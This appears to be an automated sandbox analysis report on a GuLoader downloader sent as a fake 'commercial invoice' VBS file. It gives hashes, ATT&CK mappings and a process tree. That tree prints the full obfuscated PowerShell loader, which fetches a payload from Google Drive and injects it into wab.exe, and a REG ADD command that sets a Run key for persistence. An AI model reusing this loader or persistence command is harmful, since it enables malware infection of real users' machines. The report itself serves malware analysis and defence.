guloader | 647a7adb9e483de40c1621608116a8d50cb5a0622755f555d8d11ffdc4c609a2

Analysis

max time kernel
122s
max time network
122s
platform
windows7_x64
resource
win7-20240220-en
resource tags

arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
submitted
23-04-2024 09:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

COMMERCIAL INVOICE_Finalpdf.vbs
Size

279KB
MD5

d51dd423c5f2103977df604208989252
SHA1

4944a47a3a05658a7fec601bf526c7913832c587
SHA256

e5ec544c99937977cbd0e3df39fcf93f234ff1855ceb23a758a98ba1dfa0c002
SHA512

e91bc05bd874233aa264b244ae0ff0faa0fed6ca4161d2af89f8da4099b79c55b6837cf14416a5e1031faf80cf46b3a821803c432a5d7cc99798367509647709
SSDEEP

6144:L6dAYDLBLW+8A1ytW3xrbjsSFuHeEC57kdmXl45zaoGGqAP3MQ9scOb987HIJFJW:WnS2ImtCo5inX

Score

10^/10

guloader downloader persistence

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Blocklisted process makes network request 3 IoCs

flow	pid	Process
3	2852	WScript.exe
7	2584	powershell.exe
9	2584	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Figenkaktussers% -w 1 $Cyklingens=(Get-ItemProperty -Path 'HKCU:\\Eksogenes154\\').Slockingstone;%Figenkaktussers% ($Cyklingens)"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
6	drive.google.com
7	drive.google.com
11	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
2396	wab.exe
2396	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2600	powershell.exe
2396	wab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2600 set thread context of 2396	2600	powershell.exe	35

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1988	reg.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2584	powershell.exe
2600	powershell.exe
2600	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2600	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2584	powershell.exe
Token: SeDebugPrivilege	2600	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 2852 wrote to memory of 2584	2852	WScript.exe	29
PID 2852 wrote to memory of 2584	2852	WScript.exe	29
PID 2852 wrote to memory of 2584	2852	WScript.exe	29
PID 2584 wrote to memory of 2468	2584	powershell.exe	31
PID 2584 wrote to memory of 2468	2584	powershell.exe	31
PID 2584 wrote to memory of 2468	2584	powershell.exe	31
PID 2584 wrote to memory of 2600	2584	powershell.exe	33
PID 2584 wrote to memory of 2600	2584	powershell.exe	33
PID 2584 wrote to memory of 2600	2584	powershell.exe	33
PID 2584 wrote to memory of 2600	2584	powershell.exe	33
PID 2600 wrote to memory of 2732	2600	powershell.exe	34
PID 2600 wrote to memory of 2732	2600	powershell.exe	34
PID 2600 wrote to memory of 2732	2600	powershell.exe	34
PID 2600 wrote to memory of 2732	2600	powershell.exe	34
PID 2600 wrote to memory of 2396	2600	powershell.exe	35
PID 2600 wrote to memory of 2396	2600	powershell.exe	35
PID 2600 wrote to memory of 2396	2600	powershell.exe	35
PID 2600 wrote to memory of 2396	2600	powershell.exe	35
PID 2600 wrote to memory of 2396	2600	powershell.exe	35
PID 2600 wrote to memory of 2396	2600	powershell.exe	35
PID 2396 wrote to memory of 1984	2396	wab.exe	36
PID 2396 wrote to memory of 1984	2396	wab.exe	36
PID 2396 wrote to memory of 1984	2396	wab.exe	36
PID 2396 wrote to memory of 1984	2396	wab.exe	36
PID 1984 wrote to memory of 1988	1984	cmd.exe	38
PID 1984 wrote to memory of 1988	1984	cmd.exe	38
PID 1984 wrote to memory of 1988	1984	cmd.exe	38
PID 1984 wrote to memory of 1988	1984	cmd.exe	38

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\COMMERCIAL INVOICE_Finalpdf.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2852
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Polymicrobial = 1;$Dieselises='Substrin';$Dieselises+='g';Function armlnene($Agurker){$Monastic=$Agurker.Length-$Polymicrobial;For($Liquidise=5; $Liquidise -lt $Monastic; $Liquidise+=(6)){$Caprices+=$Agurker.$Dieselises.Invoke($Liquidise, $Polymicrobial);}$Caprices;}function Alkoholindholds($Feriekoloniens){. ($Deceives) ($Feriekoloniens);}$Tiberen=armlnene '.enthM Bar oA roszAsbesiRetralKammel HaniaBaron/Hidat5 Valg.Maale0 otte Dugdu(McdonWDesori C.itnMolesdMayhaoConvewBinoms Dyed Rev.lNCheckTVilde Skvis1 S,ak0Gravi.Samar0 Bjer;Cypri S,ciaWLurkiiEnfign Kukr6.rifl4.iplo;Overe BlomsxTjavs6Binma4,utpu; Spaa byror DrukvFabr :Plasm1Wathm2.orde1Sangu.Bes.i0Engra)Organ salgsGSodereSubr.c Wet kSulpho.isma/spr,g2Villi0Hamat1 Fis 0Midde0,ever1 dis 0Darli1ikldt GrackFStetiiGeotarSkoleeF ensf jattoSophixCroto/Bo de1Clutc2Hmorr1,ffen. Co,l0Sk.bs ';$Kontrolkortets=armlnene 'UnretUSyno,s B gge IndfrAllod-UpthrA PlengKo maeF,eecn Sipht J,de ';$Nondeterminant=armlnene 'L.bathB,blitFili tMue.lp Unp,s.intm:Hypof/Repro/Datamd U.str attriUnabevDomfle Bath.Allegg Nicko Isc oProt.gNonaslLysetePrimr.UdhuscPeberoConcrm Naza/ SojauHklincI,gen?Mi kseHerpexRe.sspForduoUnmatrSmi,tt Vice=SborgdMang,oHemodw Ice.nBesnrlsti.noRe.ncafiks,dLenit&Enrapi Labid ,ryl=Vek e1RhinofYdmygwGaloceSkrabtTrom.AObedim MondcImper8LegeoxHorseVrej.iaL,ucoeOversAinebr3MarbeJ KuskVOve.l1Inimi6DrejeqU skeuFiltrsDdninGTehusxB,gni6In.irtAtomauA,regl R,beiTract6Si tnSResta0 ResiWRocka ';$Mileplens=armlnene 'Flesh> Inte ';$Deceives=armlnene 'Poly.iB ptoeStatixKfert ';$Leary='Tonsillectomy';Alkoholindholds (armlnene 'BortaSJournepaymatInest-AfhndCSkytsoUreten GidstTabubeNas.ln P.ottArau. Medle-BeslaP gtg,aForpotUnesthCorec G psuTFlout:,udge\.fterB GallePe.tisAbsory.idnenRold gbeluseHjspnlSelvbsomsaleTra trFe,ernSkyldeIt.hps Scen1 Law.7Drift4svbe,.Krkomt Wh nxTjahttSubve impre-KadenV.evala For lCoa,tuM,rkee.dapi b nde$ .enzLBirkeeshamaa skubrst tsyBabys;Reolp ');Alkoholindholds (armlnene 'G.ntiiInherf Fot. Saani(Horn tPhotoe Pegos,tikktRegi,-Dellip.ingua Mus.tVandahTunge S.netTSlitt:rodom\gardeBBlyaneSirdasSponsy Prefn Infog H eteEksprlatek,s S lieCyclorNutjonB miseHenstsGrnse1Toupe7 Out 4Woma..ionist AzimxFrettt Esti)Biote{As,ireOr.ogx.illai orgetLo gp} vig; Tan. ');$Ragtimey = armlnene 'BlndieS,ddecStinghLuftmoBi.aa Hjemk%Co.sua DelspCep,apdemisdDucefaL.pratGulsoaForlo%Ferie\ precUKernenSkinse.ribrxM,ntahB.ndfaDecoluTrim.sUegent .nikeUnrebdLepiolDemenyFlage.HelliB,prineMorgeaBet.n paike&My lo&Bygge ForpoeStadsc Besih AnaloRejeo Skrve$birdh ';Alkoholindholds (armlnene '.ldel$HystegCitollAvancoHaubebcrookablindlCorbi: ForbITitremNonblpskyggrbrugeo Ces.cMindrr Ga,eeUmag.aDynelnSlarit,axes4blu c0 Tall=Boneh(BeoercPostlmForsyd Femk Unde/PalmicD ner kary$ SassRVacila TeltgVitamtSilveiDi,hrmShetleBdeanyD vas)Vatte ');Alkoholindholds (armlnene 'Modsi$ forhg RetflDiakroTilemb cgilaSyenolL.gis:TalkuSInwrauMaskipkyll.e hospr indbeEncorxVolaic Homee DelilRechal .dgieDybstnSe,vscStrafe As r=Rande$kartoNRedreoSnigmnAffildStnineBotultFug.eeAuspirEgocemElithiAktionForvia assn Sindtpar.b.salonsGlis.p,kolelHospiiCu.sttBahoe(Femto$ FellMForeti Und,lRebegeS.mipp ArumlmedleeFlug.nrangesP.eum) beta ');$Nondeterminant=$Superexcellence[0];Alkoholindholds (armlnene 'He.om$Ch.rtgCongrl ineaofagocbTriplaNabchlMiljs:DemerSAnodee Ca,kmE.domiBaskedLysa oAttricPodopuDerm m OxideSpisen ,ristReassaEm,esrTegnkyRegis=SulphN UmiseMischwH nde-Sm,abOZebusbInterjsaltleBe rac,waggtSvag. K,rsSV,lkay ndkbsNelumtRephaeRecesmBorou. SuzaNBusteeSideotPrepa.gaeldWMidwaeP,stlbF ninC ScumlFlseriBedrieSk,lsnBefrit Voca ');Alkoholindholds (armlnene 'Cent,$ eserSMicroeRese.m Bevii AdvedShaddoSp.ndcPaintuMidrimslavee SnknnTracntPainta Farvr.yrovyUdsty.WilcoH Cloae Sp,aa Lystd stigeTeknor Cr psLumbe[Alka,$SignaKKeelbo T,van NdritPalmaravistoliplelPotenkFiskeoovererAlbyltSulfoeSho.pt p,gesPa he]Tonsi=Leuco$OvermT TermiT,uckbHove,ef,licr Maa,e HyponSamme ');$Kylling=armlnene 'HolomS Radoe,gnspmUnstai SocidPsychobr stcIkkevuT.xtimBridoe AntinIntertC,amoaI,legrHoc.lyGali..Reth.Dc.ineoBenzowPlotznPr.ktlQuamaoSidera C mpd UncaFSlagsiCon.rlIns.leFarve( dfol$DominN TachoDumbenMo.ord Rigse JordtIn ineTrninrB uremKl,ppiKodninAmatraFirednB,sebtTilsk,Chond$,emjeU W rrdKanarsR ndmk.ndivr AuchiZo,lofMindstHaandsDonjopMethirLivr.o Fo,agPittsrBlodsa odebmPanelmAfvnneUnitut PeddsBriti) emag ';$Kylling=$Improcreant40[1]+$Kylling;$Udskriftsprogrammets=$Improcreant40[0];Alkoholindholds (armlnene ' aspt$Hu megRe ril Ra,sog,wnsb.nsigaUntowlOptag:Circul,ncipoGrossp So,upEnkeleUdlans Ceret SuppiuspilkTrost=Planc(TombsTBdelle Ro.psBoudot.rege-Sp,gePAsh.laSosostIngu,h .yst uncia$ ArtaUUd.ibdPlagesFrem.kHaverrEstraiS.jrsfN ntht LupisIndhep enigrProgroEglamg P,ycruvenha Ef.emSalgsmstre.eArge,tCoffesTan.o) Ring ');while (!$loppestik) {Alkoholindholds (armlnene 'mute.$KleptgMultilTutoroE,perb rtilaMessil Snap: SypiFDristi Koumr SkrucPreimigra.afsync.r ildie LoottErhves.unni= Svov$ TasttDi kvr.aarsuSter.eNonar ') ;Alkoholindholds $Kylling;Alkoholindholds (armlnene 'Co.ntS FroutSekunaGlykorIn igt Ca f-ScareSAssiml Maske DepoeNonpapUnlit Nonex4nedtr ');Alkoholindholds (armlnene 'Nepot$St.dsgcytozl Evito hypob EvigaSamsol ,ort:KemiklHyp ioHumispD.carpRegnseShonks .eaptGenneigorank Oden=Kogek(SnvreTCessieAmicusMinimtMaiz -bnskrPGyrosa ApprtforedhFusio Don t$PhageU Pebed,ivelsHelb kFrimrr To di PincfConvetByggessubcopAstigrLi,jeoKaskegCopairSubtyaM.termudsk m LamneMeteot F,rbsImpro).dbre ') ;Alkoholindholds (armlnene 'Asona$Lsninget.eelBoychoTransb Schea ,onglIl,uv: flovF,riftr Lnk eBispemTintatpoecirDemagy BryslBoremlKvante hirt=Ress,$ZonargJokinlL,quaoLaanebSo.teaeksislGenba: GtteSNoteseSl.gsmSelvpeB.noksCon.etMakarr.egrea Fa.vlSuk.e+Ga le+Skoli%Enri,$RadioS ErotubasicpK igsefryserelecteTandsx I trcseks eCariclDampslBrnese GaelnDaimocrefere Nono. R.ndc.tavnoThromuBogienHy est Sy i ') ;$Nondeterminant=$Superexcellence[$Fremtrylle];}Alkoholindholds (armlnene ' Beta$Heav.gKlaphlParaloHinaybAntikaT.neslHovek:nonexCSubc.rTilkaaOve,lpSubatePlaybtHa matArmbreMillw Jerki=Pup.l Se irGSkarpeAg rhtJentj-GamasClac.roYpotrn ForstHippoeOutsin ServtOyste .ent$,ryptU Se idDedicsSygevkNetvrr For.i NybyfForsttLatens PrinpUdsterPommeoTornyg HujerPassla Coarm eprimFjerdeBet,atAn epsTaenk ');Alkoholindholds (armlnene 'Tjekk$ escrgAntenlA,tmaoCarnibIfaldaSubdelV,der: BraiVAmiraiTro,lvSpurgiRhampaPreffnBrune Altin=Te ra Orto [BouilS Pandy,iklasTopogtquinieKildemn.tur..enarCKurveo OstenMinisvUrtegePer,crUdl.stSuper] A,fa:Lolla: RetuFr.giorAfstnoAuctimCrocoBColliaP olssObstee Omkr6Sturd4,rediSCr.nktDukysr DarkiKohemnFlybogPodso(To dk$Ord.eC Ant rA.cona.hackpBremse RetutStavetFortueSides)Rambu ');Alkoholindholds (armlnene 'Skumb$BuklegC noolUnderoApostbSu siaHya olditsi: enapPSlvsiaHv.serRigseaSpukefTinperDulmpa OransUnfraeFunkt brand= reno Blind[ OphoSMagney,hephsP,gmetFaceheBa.qumTurne.Cy.riT,mugkeRekinxKvintt T.in.PaterEWeenan,labecOviceo Alied GeneiNeofinLi,hogSkr,v] G,eg:Rente:Lush.ArdgraSMappeCJebliIStje,IDrawc.JirblGBilineEctoptVillaSForskt Fehar SammiV rksn AnvegStopu(p aty$NonliVExcesiKumenvSejrti ogbaShittnjunef) sabe ');Alkoholindholds (armlnene ' .all$ NedbgOpskrlHistooHaemobBund.ap,otulFjerk:Ee ssWStyltaDyf,esOrdenh GalsaAla.tkArbe i .lui5Udlev1Aflad= .syl$Misa.P Intea Air.rAerobaVenulfCroupr U lea Cures Kbeke Flov.Access ShaduD,ivkbForl sPhalatA.fiarunc.iiAluminKnowlgForse(Agdis3s.mic1,enin0Armbi6A.iri1Sh,ma2Polyh, Whi,2Lion.8c.iti5indry2levne6Therm) Kvin ');Alkoholindholds $Washaki51;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2584
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Unexhaustedly.Bea && echo $"
    3⤵
    PID:2468
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Polymicrobial = 1;$Dieselises='Substrin';$Dieselises+='g';Function armlnene($Agurker){$Monastic=$Agurker.Length-$Polymicrobial;For($Liquidise=5; $Liquidise -lt $Monastic; $Liquidise+=(6)){$Caprices+=$Agurker.$Dieselises.Invoke($Liquidise, $Polymicrobial);}$Caprices;}function Alkoholindholds($Feriekoloniens){. ($Deceives) ($Feriekoloniens);}$Tiberen=armlnene '.enthM Bar oA roszAsbesiRetralKammel HaniaBaron/Hidat5 Valg.Maale0 otte Dugdu(McdonWDesori C.itnMolesdMayhaoConvewBinoms Dyed Rev.lNCheckTVilde Skvis1 S,ak0Gravi.Samar0 Bjer;Cypri S,ciaWLurkiiEnfign Kukr6.rifl4.iplo;Overe BlomsxTjavs6Binma4,utpu; Spaa byror DrukvFabr :Plasm1Wathm2.orde1Sangu.Bes.i0Engra)Organ salgsGSodereSubr.c Wet kSulpho.isma/spr,g2Villi0Hamat1 Fis 0Midde0,ever1 dis 0Darli1ikldt GrackFStetiiGeotarSkoleeF ensf jattoSophixCroto/Bo de1Clutc2Hmorr1,ffen. Co,l0Sk.bs ';$Kontrolkortets=armlnene 'UnretUSyno,s B gge IndfrAllod-UpthrA PlengKo maeF,eecn Sipht J,de ';$Nondeterminant=armlnene 'L.bathB,blitFili tMue.lp Unp,s.intm:Hypof/Repro/Datamd U.str attriUnabevDomfle Bath.Allegg Nicko Isc oProt.gNonaslLysetePrimr.UdhuscPeberoConcrm Naza/ SojauHklincI,gen?Mi kseHerpexRe.sspForduoUnmatrSmi,tt Vice=SborgdMang,oHemodw Ice.nBesnrlsti.noRe.ncafiks,dLenit&Enrapi Labid ,ryl=Vek e1RhinofYdmygwGaloceSkrabtTrom.AObedim MondcImper8LegeoxHorseVrej.iaL,ucoeOversAinebr3MarbeJ KuskVOve.l1Inimi6DrejeqU skeuFiltrsDdninGTehusxB,gni6In.irtAtomauA,regl R,beiTract6Si tnSResta0 ResiWRocka ';$Mileplens=armlnene 'Flesh> Inte ';$Deceives=armlnene 'Poly.iB ptoeStatixKfert ';$Leary='Tonsillectomy';Alkoholindholds (armlnene 'BortaSJournepaymatInest-AfhndCSkytsoUreten GidstTabubeNas.ln P.ottArau. Medle-BeslaP gtg,aForpotUnesthCorec G psuTFlout:,udge\.fterB GallePe.tisAbsory.idnenRold gbeluseHjspnlSelvbsomsaleTra trFe,ernSkyldeIt.hps Scen1 Law.7Drift4svbe,.Krkomt Wh nxTjahttSubve impre-KadenV.evala For lCoa,tuM,rkee.dapi b nde$ .enzLBirkeeshamaa skubrst tsyBabys;Reolp ');Alkoholindholds (armlnene 'G.ntiiInherf Fot. Saani(Horn tPhotoe Pegos,tikktRegi,-Dellip.ingua Mus.tVandahTunge S.netTSlitt:rodom\gardeBBlyaneSirdasSponsy Prefn Infog H eteEksprlatek,s S lieCyclorNutjonB miseHenstsGrnse1Toupe7 Out 4Woma..ionist AzimxFrettt Esti)Biote{As,ireOr.ogx.illai orgetLo gp} vig; Tan. ');$Ragtimey = armlnene 'BlndieS,ddecStinghLuftmoBi.aa Hjemk%Co.sua DelspCep,apdemisdDucefaL.pratGulsoaForlo%Ferie\ precUKernenSkinse.ribrxM,ntahB.ndfaDecoluTrim.sUegent .nikeUnrebdLepiolDemenyFlage.HelliB,prineMorgeaBet.n paike&My lo&Bygge ForpoeStadsc Besih AnaloRejeo Skrve$birdh ';Alkoholindholds (armlnene '.ldel$HystegCitollAvancoHaubebcrookablindlCorbi: ForbITitremNonblpskyggrbrugeo Ces.cMindrr Ga,eeUmag.aDynelnSlarit,axes4blu c0 Tall=Boneh(BeoercPostlmForsyd Femk Unde/PalmicD ner kary$ SassRVacila TeltgVitamtSilveiDi,hrmShetleBdeanyD vas)Vatte ');Alkoholindholds (armlnene 'Modsi$ forhg RetflDiakroTilemb cgilaSyenolL.gis:TalkuSInwrauMaskipkyll.e hospr indbeEncorxVolaic Homee DelilRechal .dgieDybstnSe,vscStrafe As r=Rande$kartoNRedreoSnigmnAffildStnineBotultFug.eeAuspirEgocemElithiAktionForvia assn Sindtpar.b.salonsGlis.p,kolelHospiiCu.sttBahoe(Femto$ FellMForeti Und,lRebegeS.mipp ArumlmedleeFlug.nrangesP.eum) beta ');$Nondeterminant=$Superexcellence[0];Alkoholindholds (armlnene 'He.om$Ch.rtgCongrl ineaofagocbTriplaNabchlMiljs:DemerSAnodee Ca,kmE.domiBaskedLysa oAttricPodopuDerm m OxideSpisen ,ristReassaEm,esrTegnkyRegis=SulphN UmiseMischwH nde-Sm,abOZebusbInterjsaltleBe rac,waggtSvag. K,rsSV,lkay ndkbsNelumtRephaeRecesmBorou. SuzaNBusteeSideotPrepa.gaeldWMidwaeP,stlbF ninC ScumlFlseriBedrieSk,lsnBefrit Voca ');Alkoholindholds (armlnene 'Cent,$ eserSMicroeRese.m Bevii AdvedShaddoSp.ndcPaintuMidrimslavee SnknnTracntPainta Farvr.yrovyUdsty.WilcoH Cloae Sp,aa Lystd stigeTeknor Cr psLumbe[Alka,$SignaKKeelbo T,van NdritPalmaravistoliplelPotenkFiskeoovererAlbyltSulfoeSho.pt p,gesPa he]Tonsi=Leuco$OvermT TermiT,uckbHove,ef,licr Maa,e HyponSamme ');$Kylling=armlnene 'HolomS Radoe,gnspmUnstai SocidPsychobr stcIkkevuT.xtimBridoe AntinIntertC,amoaI,legrHoc.lyGali..Reth.Dc.ineoBenzowPlotznPr.ktlQuamaoSidera C mpd UncaFSlagsiCon.rlIns.leFarve( dfol$DominN TachoDumbenMo.ord Rigse JordtIn ineTrninrB uremKl,ppiKodninAmatraFirednB,sebtTilsk,Chond$,emjeU W rrdKanarsR ndmk.ndivr AuchiZo,lofMindstHaandsDonjopMethirLivr.o Fo,agPittsrBlodsa odebmPanelmAfvnneUnitut PeddsBriti) emag ';$Kylling=$Improcreant40[1]+$Kylling;$Udskriftsprogrammets=$Improcreant40[0];Alkoholindholds (armlnene ' aspt$Hu megRe ril Ra,sog,wnsb.nsigaUntowlOptag:Circul,ncipoGrossp So,upEnkeleUdlans Ceret SuppiuspilkTrost=Planc(TombsTBdelle Ro.psBoudot.rege-Sp,gePAsh.laSosostIngu,h .yst uncia$ ArtaUUd.ibdPlagesFrem.kHaverrEstraiS.jrsfN ntht LupisIndhep enigrProgroEglamg P,ycruvenha Ef.emSalgsmstre.eArge,tCoffesTan.o) Ring ');while (!$loppestik) {Alkoholindholds (armlnene 'mute.$KleptgMultilTutoroE,perb rtilaMessil Snap: SypiFDristi Koumr SkrucPreimigra.afsync.r ildie LoottErhves.unni= Svov$ TasttDi kvr.aarsuSter.eNonar ') ;Alkoholindholds $Kylling;Alkoholindholds (armlnene 'Co.ntS FroutSekunaGlykorIn igt Ca f-ScareSAssiml Maske DepoeNonpapUnlit Nonex4nedtr ');Alkoholindholds (armlnene 'Nepot$St.dsgcytozl Evito hypob EvigaSamsol ,ort:KemiklHyp ioHumispD.carpRegnseShonks .eaptGenneigorank Oden=Kogek(SnvreTCessieAmicusMinimtMaiz -bnskrPGyrosa ApprtforedhFusio Don t$PhageU Pebed,ivelsHelb kFrimrr To di PincfConvetByggessubcopAstigrLi,jeoKaskegCopairSubtyaM.termudsk m LamneMeteot F,rbsImpro).dbre ') ;Alkoholindholds (armlnene 'Asona$Lsninget.eelBoychoTransb Schea ,onglIl,uv: flovF,riftr Lnk eBispemTintatpoecirDemagy BryslBoremlKvante hirt=Ress,$ZonargJokinlL,quaoLaanebSo.teaeksislGenba: GtteSNoteseSl.gsmSelvpeB.noksCon.etMakarr.egrea Fa.vlSuk.e+Ga le+Skoli%Enri,$RadioS ErotubasicpK igsefryserelecteTandsx I trcseks eCariclDampslBrnese GaelnDaimocrefere Nono. R.ndc.tavnoThromuBogienHy est Sy i ') ;$Nondeterminant=$Superexcellence[$Fremtrylle];}Alkoholindholds (armlnene ' Beta$Heav.gKlaphlParaloHinaybAntikaT.neslHovek:nonexCSubc.rTilkaaOve,lpSubatePlaybtHa matArmbreMillw Jerki=Pup.l Se irGSkarpeAg rhtJentj-GamasClac.roYpotrn ForstHippoeOutsin ServtOyste .ent$,ryptU Se idDedicsSygevkNetvrr For.i NybyfForsttLatens PrinpUdsterPommeoTornyg HujerPassla Coarm eprimFjerdeBet,atAn epsTaenk ');Alkoholindholds (armlnene 'Tjekk$ escrgAntenlA,tmaoCarnibIfaldaSubdelV,der: BraiVAmiraiTro,lvSpurgiRhampaPreffnBrune Altin=Te ra Orto [BouilS Pandy,iklasTopogtquinieKildemn.tur..enarCKurveo OstenMinisvUrtegePer,crUdl.stSuper] A,fa:Lolla: RetuFr.giorAfstnoAuctimCrocoBColliaP olssObstee Omkr6Sturd4,rediSCr.nktDukysr DarkiKohemnFlybogPodso(To dk$Ord.eC Ant rA.cona.hackpBremse RetutStavetFortueSides)Rambu ');Alkoholindholds (armlnene 'Skumb$BuklegC noolUnderoApostbSu siaHya olditsi: enapPSlvsiaHv.serRigseaSpukefTinperDulmpa OransUnfraeFunkt brand= reno Blind[ OphoSMagney,hephsP,gmetFaceheBa.qumTurne.Cy.riT,mugkeRekinxKvintt T.in.PaterEWeenan,labecOviceo Alied GeneiNeofinLi,hogSkr,v] G,eg:Rente:Lush.ArdgraSMappeCJebliIStje,IDrawc.JirblGBilineEctoptVillaSForskt Fehar SammiV rksn AnvegStopu(p aty$NonliVExcesiKumenvSejrti ogbaShittnjunef) sabe ');Alkoholindholds (armlnene ' .all$ NedbgOpskrlHistooHaemobBund.ap,otulFjerk:Ee ssWStyltaDyf,esOrdenh GalsaAla.tkArbe i .lui5Udlev1Aflad= .syl$Misa.P Intea Air.rAerobaVenulfCroupr U lea Cures Kbeke Flov.Access ShaduD,ivkbForl sPhalatA.fiarunc.iiAluminKnowlgForse(Agdis3s.mic1,enin0Armbi6A.iri1Sh,ma2Polyh, Whi,2Lion.8c.iti5indry2levne6Therm) Kvin ');Alkoholindholds $Washaki51;"
    3⤵
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2600
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Unexhaustedly.Bea && echo $"
      4⤵
      PID:2732
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of WriteProcessMemory
      PID:2396
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Figenkaktussers% -w 1 $Cyklingens=(Get-ItemProperty -Path 'HKCU:\Eksogenes154\').Slockingstone;%Figenkaktussers% ($Cyklingens)"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1984
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Figenkaktussers% -w 1 $Cyklingens=(Get-ItemProperty -Path 'HKCU:\Eksogenes154\').Slockingstone;%Figenkaktussers% ($Cyklingens)"
        6⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:1988

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
304B

MD5
a306be16338e9b2b68dda25db7d24956

SHA1
0966acf99a4ddd431f5a7d2e1ff37f09cbcffd7c

SHA256
c72bbdaeaba815a82ecfa19f8e3fedbae647a601b38acdc6af75deb321235b49

SHA512
260ad02e403a8b54539b7d287ecc029e4111295da329aeb948c582e924f4fb38df87e7fa0fd121902b25e0fcf72c8e6a53511ab61be7dabc63c02ebf47a24548

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7DSRHHW0IY5XTM4X7F6B.temp

Filesize
7KB

MD5
26ef5705848b0977cca0af7d53eeb0dc

SHA1
7cf24ab4698cf46df4f769f1d775519d50b9c9b1

SHA256
09d13f50eccd7185774d8d38a43c00c8d11cad6cbd0e7320154036c4a488fba6

SHA512
c93d00f10e21611ba6c9d4218a034b9fa295d4fd9e2629211776f2ffe45cc2720049406c7bf0d25563ebee55b0a5fc620d8cc732bfdb49a3265d1cc961e12f54

Download Submit
C:\Users\Admin\AppData\Roaming\Unexhaustedly.Bea

Filesize
441KB

MD5
84ca909be927e397aa5132074da15c07

SHA1
75a67d4ab19e9a1ed49e64feab9eed09ed33e181

SHA256
761e72ae7fcd658fde092259e0981f1955214ea1bd01742ce69a6e322f7e1119

SHA512
f3e964fd675e463917af94028b63ff672217ff1f7dbebf162d497299b9acbb5f6c5f48044772e6d0fee2e106788126838cd6736ec39bfeab5bb39426d5393b0f

Download Submit
memory/2396-76-0x0000000001520000-0x0000000006674000-memory.dmp

Filesize
81.3MB

Download
memory/2396-51-0x0000000077586000-0x0000000077587000-memory.dmp

Filesize
4KB

Download
memory/2396-52-0x0000000077550000-0x0000000077626000-memory.dmp

Filesize
856KB

Download
memory/2396-49-0x0000000077360000-0x0000000077509000-memory.dmp

Filesize
1.7MB

Download
memory/2396-78-0x0000000077550000-0x0000000077626000-memory.dmp

Filesize
856KB

Download
